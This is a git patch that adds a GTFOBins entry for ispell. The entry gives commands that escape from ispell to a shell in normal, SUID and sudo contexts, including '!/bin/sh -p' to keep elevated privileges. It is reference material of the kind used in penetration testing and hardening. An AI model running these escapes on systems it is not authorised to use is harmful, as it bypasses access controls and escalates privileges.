From 50ab4f0ce0ff61912254a10a46e9b70cbde73297 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 26 Jan 2022 23:06:33 +0100 Subject: [PATCH] Add ispell shell Close #259 --- _gtfobins/ispell.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/ispell.md diff --git a/_gtfobins/ispell.md b/_gtfobins/ispell.md new file mode 100644 index 0000000..3a90351 --- /dev/null +++ b/_gtfobins/ispell.md @@ -0,0 +1,15 @@ +--- +functions: + shell: + - code: | + ispell /etc/passwd + !/bin/sh + suid: + - code: | + ./ispell /etc/passwd + !/bin/sh -p + sudo: + - code: | + sudo ispell /etc/passwd + !/bin/sh +---